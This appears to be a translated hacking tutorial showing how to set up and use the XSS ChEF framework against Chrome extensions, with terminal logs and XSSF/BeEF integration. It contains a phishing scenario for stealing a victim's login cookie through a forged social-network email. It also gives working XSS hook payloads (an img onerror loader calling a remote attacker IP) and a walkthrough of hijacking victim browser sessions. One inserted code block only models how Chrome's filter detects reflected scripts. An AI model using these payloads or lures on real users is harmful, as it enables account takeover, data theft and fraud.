XSS ChEF v1.0 graphic tutorial
We all know that XSS vulnerabilities come in two basic forms: stored XSS and reflected XSS. Stored XSS persists the cross-site script: if user input is not encoded when it is processed and the dynamic output is not encoded when the page is rendered, every user who visits the page is affected. Reflected XSS uses a specially crafted URL whose request parameters contain the cross-site script; if the page echoes the parameter content without filtering, the user who opens the link is attacked. Chrome's XSS Filter is aimed mainly at reflected XSS. Some people may ask: with reflected XSS, how would anyone ever visit such a strange link? Imagine that an SNS website fond of sending notification mail has an XSS vulnerability, and you have automatic login enabled for it. I want to steal your account, and I know who you recently fell in love with, and she is your friend on this SNS! With that information it is easy to steal your account. First I carefully construct a link carrying the cross-site script in its parameters, then I forge a reminder email from this SNS saying that she commented on your photo and called you handsome! The comment link points to the malicious URI, and the From header is forged so the mail appears to come from the SNS. When you receive this email, even with strong security awareness, are you sure you will calmly inspect the URL before clicking it? If you click, I get your login cookie or capture some of your private SNS content! And if I want to steal many accounts at once, I can replace the personal lure with a generic one, "take part in the XXX activity organized by XXX network and get XXX for free", and send it to a spam list! I believe plenty of people still like free XXX! Back in elementary school we were already told not to go off with strangers, it is mostly unsafe! That principle seems to apply to the Internet too!
Chrome introduced the XSS Filter to protect users who cannot resist all these temptations. Its basic principle is to compare each JavaScript script about to execute against the request parameters: if the script to be executed also appears in the request parameters, its execution is blocked. That looks good. Of course, there are also many ways to bypass this filter. Several have been published by experts on the Internet; some have been fixed officially, some have not been fixed yet, and there are probably many more undisclosed 0-days.
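As an added illustration, not part of the original tutorial or of XSS ChEF, here is a simplified model of that decision rule in JavaScript: an inline script found in the rendered page is treated as reflected, and blocked, only when its text also appears in a request parameter, which is why a stored payload passes untouched. The URLs and HTML fragments are constructed sample data.

```javascript
// Added example (not from the tutorial or the XSS ChEF project): a
// simplified model of a reflected-XSS filter's decision rule. Real
// filters hook the HTML tokenizer; this only shows the core comparison:
// an inline script is blocked iff it also appears in a request parameter.

// Drop whitespace and case so trivial differences do not hide a match.
function normalize(s) {
  return s.replace(/\s+/g, '').toLowerCase();
}

// Decoded values of every query parameter in the request URL.
function requestParams(url) {
  return Array.from(new URL(url).searchParams.values());
}

// Inline <script> bodies and on*="..." handler bodies in the rendered
// page. A tiny regex matcher is enough for the demo; it is not a parser.
function inlineScripts(html) {
  const found = [];
  for (const m of html.matchAll(/<script[^>]*>([\s\S]*?)<\/script>/gi)) found.push(m[1]);
  for (const m of html.matchAll(/\son\w+\s*=\s*"([^"]*)"/gi)) found.push(m[1]);
  return found;
}

// For each inline script, decide whether the filter would block it:
// blocked when some request parameter contains the script's text.
function auditPage(url, html) {
  const params = requestParams(url).map(normalize);
  return inlineScripts(html).map((script) => ({
    script,
    blocked: params.some((p) => p.includes(normalize(script))),
  }));
}

// Constructed sample data. Reflected: the payload travels in ?q= and is
// echoed by the page. Stored: the payload sits in server-side content
// and the URL carries nothing suspicious, so the filter cannot see it.
const REFLECTED_URL = 'http://example.test/search?q=<img src=x onerror="alert(1)">';
const REFLECTED_HTML = '<p>No results for <img src=x onerror="alert(1)"></p>';
const STORED_URL = 'http://example.test/profile?id=42';
const STORED_HTML = '<div class="bio">hi<script>alert(1)</script></div>';

console.log(auditPage(REFLECTED_URL, REFLECTED_HTML)); // blocked: true
console.log(auditPage(STORED_URL, STORED_HTML));       // blocked: false
```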
Krzysztof Kotowicz (https://github.com/koto/xsschef) wrote a tool for exactly this, the Chrome Terminator: XSS ChEF.
Obtain the source code
root@Dis9Team:~# cd /var/www
root@Dis9Team:/var/www# git clone https://github.com/koto/xsschef.git
Cloning into xsschef...
remote: Counting objects: 540, done.
remote: Compressing objects: 100% (297/297), done.
remote: Total 540 (delta 333), reused 446 (delta 239)
Receiving objects: 100% (540/540), 310.97 KiB | 102 KiB/s, done.
Resolving deltas: 100% (333/333), done.
root@Dis9Team:/var/www/xsschef# ls
bootstrap hook.php README.md server-xhr.php tools
console.html LICENCE server.js snippets vulnerable_chrome_extension
favicon.ico php-websocket server.php snippets.xml.php xsschef.js
root@Dis9Team:/var/www/xsschef#
Node.js
It provides two startup methods, Node.js and PHP. Node.js is a JavaScript toolkit for building high-performance network servers; it is easy to understand.
root@Dis9Team:/var/www/xsschef# sudo apt-get install libssl-dev
root@Dis9Team:/var/www/xsschef# cd /tmp
root@Dis9Team:/tmp# wget http://nodejs.org/dist/v0.8.7/node-v0.8.7-linux-x86.tar.gz
root@Dis9Team:/tmp# tar xf node-v0.8.7-linux-x86.tar.gz
root@Dis9Team:/tmp# cd node-v0.8.7-linux-x86
root@Dis9Team:/tmp/node-v0.8.7-linux-x86# mkdir /usr/local/node
root@Dis9Team:/tmp/node-v0.8.7-linux-x86# cp -rf * /usr/local/node/
root@Dis9Team:/tmp/node-v0.8.7-linux-x86# ln -s /usr/local/node/bin/n* /usr/bin/
Install the components
root@Dis9Team:/tmp/node-v0.8.7-linux-x86/node_modules# cd /usr/local/node/
root@Dis9Team:/usr/local/node# npm install websocket
root@Dis9Team:/usr/local/node# npm install node-static
Start the server
root@Dis9Team:/var/www/xsschef# node server.js
XSS ChEF server
by Krzysztof Kotowicz - kkotowicz at gmail dot com
Usage: node server.js [port=8080]
Communication is logged to stderr, use node server.js [port] 2>log.txt
Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) ChEF server is listening on port 8080
Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) Console URL: http://127.0.0.1:8080/
Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) Hook URL: http://127.0.0.1:8080/hook
Hook: http://127.0.0.1:8080/hook
UI: http://127.0.0.1:8080/
In the console UI, click "get hook code". For example:
if(location.protocol.indexOf('chrome')==0){d=document;e=createElement('script');e.src='__HOOK_URL__';d.body.appendChild(e);}
And:
<img src=x onerror="if(location.protocol.indexOf('chrome')==0){d=document;e=createElement('script');e.src='__HOOK_URL__';d.body.appendChild(e);}">
Replace __HOOK_URL__ with your hook address (http://127.0.0.1:8080/hook.php), using a public Internet IP address. Mine is:
<img src=x onerror="if(location.protocol.indexOf('chrome')==0){d=document;e=createElement('script');e.src='http://5.5.5.4:8080/hook.php';d.body.appendChild(e);}">
Test attack
The project ships a deliberately vulnerable Chrome extension for testing, vulnerable_chrome_extension, in the xsschef directory.
Install the extension in Chrome
Run the extension and inject the XSS hook code
Query the sessions
Select a session
Now we can perform some evil operations on the victim.
It provides a lot of ready-made eval snippets by default.
Trivial JS
With BEEF and XSSF
XSSF
Start XSSF
msf > xssf_urls
[+] XSSF Server : 'http://10.0.3.15:8888/' or 'http://:8888/'
[+] Generic XSS injection: 'http://10.0.3.15:8888/loop' or 'http://:8888/loop'
[+] XSSF test page : 'http://10.0.3.15:8888/test.html' or 'http://:8888/test.html'
[+] XSSF Tunnel Proxy : 'localhost:8889'
[+] XSSF logs page : 'http://localhost:8889/gui.html?guipage=main'
[+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
[+] XSSF help page : 'http://localhost:8889/gui.html?guipage=help'
msf >
Hook: http://5.5.5.4:8888/loop, inject it:
BEEF
Start BEEF...